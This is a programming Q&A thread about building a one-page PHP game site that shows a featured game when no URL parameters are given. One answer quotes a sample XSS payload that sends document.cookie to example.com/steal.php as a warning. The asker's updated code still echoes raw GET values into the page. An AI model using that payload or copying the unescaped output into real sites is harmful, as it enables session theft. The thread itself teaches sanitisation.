I am creating a game web site using PHP and I want to just use one page for the game rather than have a bunch. I want to have the info entered like this:

`?swf=[path to .swf]&name=[name of game]&description=[Description of Game]&instruction=[Instructions for game]`

The problem is that if there is no data entered in the URL it returns a black page. I want to use the if...else to display a featured game if nothing is in the URL. The code I have right now is:

<?php $name=$_GET["name"];
if ($name=="*")
echo "<h3>$name</h3>";
else
echo "Featured Game Name";
?>

<?php $description=$_GET["description"];
if ($description=="*")
echo "<h5>$description</h5>";
else
echo "<h5>Featured Game Description</h5>";
?>

<object type="application/x-shockwave-flash" data="
<?php $swf=$_GET["swf"];
if ($swf=="*")
echo "$swf";
else
echo "Featured Game swf path";
?>
" width="700" height="400">
<param name="movie" value="
<?php $swf=$_GET["swf"];
if ($swf=="*")
echo "$swf";
else
echo "Featured Game swf path";
?>
" />
</object>

<?php $instruction=$_GET["instruction"];
if ($instruction=="*")
echo "<p>$instruction</p>";
else
echo "Featured Game Instruction";
?>

Can anyone offer any suggestions on ways to accomplish this?

+3  A: 

I'm not sure what the if ($name=="*") does, but I would use

if(isset($_GET['name']))

instead, to check if the name was passed to the url.

Fortega
yepp use isset is correct
streetparade
A: 
if(empty($_GET['swf']) and empty($_GET['name']) and empty($_GET['description']) and empty($_GET['instruction'])){
/// code here
}else{
/// and here
}
lfx
Fortega
...and it should probably be `or` or `||` instead, as it seems to me all the values are required, so even one empty should evaluate to false.
nikc
And by evaluate to false, I mean true.
nikc
+1  A: 

I assume with $_GET['name'] == "*" you are mixing up something. In that context it is just a string comparison. * is not a wildcard that matches anything like in SQL. If you want to check if there is something in $_GET['name'], you could use empty or isset.

In addition, I suggest you just check for name, because all your params conceptually belong to game. If there is no name, there will be no description and no instructions.

But whatever you do, be sure to sanitize the params you are going to output, otherwise someone will supply this or something similar for name sooner or later:

<script>document.location='http://www.example.com/steal.php?'+document.cookie</script>
Gordon
How would I be able to sanitize this? I never thought of this, but that is a big security hole.
Jason
Well, you just remove anything malicious. Almost all PHP Frameworks offer some sort of filters and as of PHP 5.2.0 you can use the data filtering functions. See http://www.php.net/manual/en/book.filter.php and some examples here http://www.phpro.org/tutorials/Filtering-Data-with-PHP.html
Gordon
A: 

I have updated my code and it is working properly.

My new code is:

<?php
$featured_name = "name";
$featured_description = "description";
$featured_swf = "swf";
$featured_instructions = "instructions";
?>
      <h3>
       <?php
        if(isset($_GET['name']))
         echo $_GET["name"];
        else
         echo $featured_name;
       ?>
      </h3>

      <h5>
       <?php
        if(isset($_GET['description']))
         echo $_GET["description"];
        else
         echo $featured_description;
       ?>
      </h5>

      <object type="application/x-shockwave-flash"
      data="
       <?php
        if(isset($_GET['swf']))
         echo $_GET["swf"];
        else
         echo $featured_swf;
       ?>
      "
      width="700" height="400">
      <param name="movie"
      value="
       <?php
        if(isset($_GET['swf']))
         echo $_GET["swf"];
        else
         echo $featured_swf;
       ?>
       " />
      </object>

      <p>
       <?php
        if(isset($_GET['instructions']))
         echo $_GET["instructions"];
        else
         echo $featured_instructions;
       ?>
      </p>

I have another question: how can I define a variable that has a space in it? I would like to do this since my partner (who creates most of the games) doesn't know much about PHP or HTML and defining variables at the top of the document would make it easier for him.

Jason
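
Added example (not code from any of the posts above): one way to act on Gordon's warning when rendering the updated page, escaping every parameter for its HTML context and restricting `swf` to a file name inside an assumed `games/` directory. The helper names `e`, `gameParam` and `safeSwfPath`, the `$featured` values, and the rule that `swf` carries only a file name are assumptions; PHP 7 or later is assumed.

```php
<?php
// Added example; helper names, paths and defaults are assumptions, not the poster's code.
$featured = [
    'name'        => 'Featured Game Name',
    'description' => 'Featured Game Description',
    'swf'         => 'games/featured.swf',   // constructed path
    'instruction' => 'Featured Game Instruction',
];

// Escape a value for HTML text and for quoted attribute values.
function e(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Return the trimmed parameter, or the featured default if it is missing or empty.
function gameParam(array $query, string $key, array $defaults): string
{
    $value = $query[$key] ?? '';
    if (!is_string($value)) {            // e.g. ?name[]=x arrives as an array
        return $defaults[$key];
    }
    $value = trim($value);
    return $value === '' ? $defaults[$key] : $value;
}

// Escaping alone does not limit where the <object> loads from,
// so accept only a bare .swf file name and prefix the local directory.
function safeSwfPath(array $query, array $defaults): string
{
    $value = gameParam($query, 'swf', $defaults);
    if (preg_match('/\A[A-Za-z0-9_-]+\.swf\z/', $value) === 1) {
        return 'games/' . $value;
    }
    return $defaults['swf'];
}

$name        = gameParam($_GET, 'name', $featured);
$description = gameParam($_GET, 'description', $featured);
$instruction = gameParam($_GET, 'instruction', $featured);
$swf         = safeSwfPath($_GET, $featured);
?>
<h3><?= e($name) ?></h3>
<h5><?= e($description) ?></h5>
<object type="application/x-shockwave-flash" data="<?= e($swf) ?>" width="700" height="400">
  <param name="movie" value="<?= e($swf) ?>" />
</object>
<p><?= e($instruction) ?></p>
```

With this version a `name` value containing markup is rendered as visible text instead of being interpreted by the browser, and any `swf` value that is not a plain file name falls back to the featured game.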